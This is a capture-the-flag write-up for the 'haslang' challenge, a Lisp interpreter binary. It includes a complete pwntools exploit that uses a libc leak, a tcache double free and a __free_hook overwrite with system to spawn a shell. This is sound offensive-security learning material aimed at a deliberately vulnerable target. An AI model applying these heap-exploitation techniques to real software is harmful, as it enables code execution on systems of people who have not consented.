xctf-final (7th) - haslang

Not a challenge with much learning value.

From the error messages it turned out to be a Lisp interpreter, so I went straight to extracting strings; no sane person is going to reverse 1k+ functions.

```bash
strings -t x ./haslang | grep -E '[[:alnum:]]' >sym.txt
```

The strings reveal that alloc, free, editChunk and showChunk are available. alloc and free are ordinary Lisp syntax; only editChunk is a little more awkward.

```lisp
(define ptr1 (alloc 1168))
(free ptr1)
(showChunk ptr1)
(editChunk ptr1 0 1)
```

ptr1 is just a variable name; chunks can be created under different variable names. The alloc size and the edit data can only be decimal integers, so the exploit needs some data conversion. Also, show only prints visible characters and silently drops the non-visible ones, so the libc leak has to be brute-forced.

In editChunk the 0 is the index: one 8-byte memory slot has indices 0-7, and the third parameter is the data to write.

EXP

```python
from pwn import *
# strings -t x ./haslang | grep -E '[[:alnum:]]' >sym.txt
# patchelf --set-interpreter ./glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so --set-rpath ./glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64 haslang
elf = ELF('./haslang')
libc = elf.libc
# context.log_level = 'debug'

# Interpreter primitives found via strings:
# (define ptr1 (alloc 1168))
# (free ptr1)
# (showChunk ptr1)
# (editChunk ptr1 0 1)

# Wrappers around the interpreter's REPL; `r` is the global process handle.
def add(who, size):
    r.sendlineafter('>>> ', '(define ' + str(who) + ' (alloc ' + str(size) + '))')

def free(who):
    r.sendlineafter('>>> ', '(free ' + str(who) + ')')

def edit(who, idx, what):
    # idx is the byte index, what is one byte given as a decimal integer
    r.sendlineafter('>>> ', '(editChunk ' + str(who) + ' ' + str(idx) + ' ' + str(what) + ')')

def show(who):
    r.sendlineafter('>>> ', '(showChunk ' + str(who) + ')')

# gdb.attach(r)

def exp(r):
    add('ptr0', 0x20)
    add('ptr1', 0x500)
    add('ptr2', 0x20)
    add('ptr3', 0x20)
    edit('ptr3', 0, 0x73)  # s
    edit('ptr3', 1, 0x68)  # h
    free('ptr1')
    show('ptr1')
    # showChunk drops non-visible bytes, so the missing low byte is added back
    leak = u64(r.recvuntil(b'\x7f', timeout=1).ljust(8, b'\x00')) * 0x100 + 0xa0
    print(hex(leak))
    free('ptr0')
    edit('ptr0', 8, 0)
    edit('ptr0', 9, 0)
    edit('ptr0', 10, 0)
    free('ptr0')
    base = leak - 0xdb4ca0
    print(hex(base))
    hook = base + 0xdb68e8
    sys = base + 0xa18420
    print(hex(hook))
    addr = int(hex(hook), 16)

    # convert each byte to decimal, one editChunk call per byte
    dec_list = list(addr.to_bytes(8, 'little'))
    for i in range(len(dec_list)):
        edit('ptr0', i, dec_list[i])
    show('ptr0')
    leak = u64(r.recvuntil(b'\x7f', timeout=1).ljust(8, b'\x00')) * 0x10 + 0xa0
    add('ptr0', 0x20)
    add('ptr0', 0x20)

    addr = int(hex(sys), 16)
    # convert each byte to decimal
    dec_list = list(addr.to_bytes(8, 'little'))
    for i in range(len(dec_list)):
        edit('ptr0', i, dec_list[i])
    free('ptr3')  # system('sh')
    r.interactive()

# the leak is lossy, so retry until a run succeeds
while True:
    try:
        r = process('./haslang')
        exp(r)
    except Exception as e:
        r.close()
```
  • Copyrights © 2021-2023 H.greed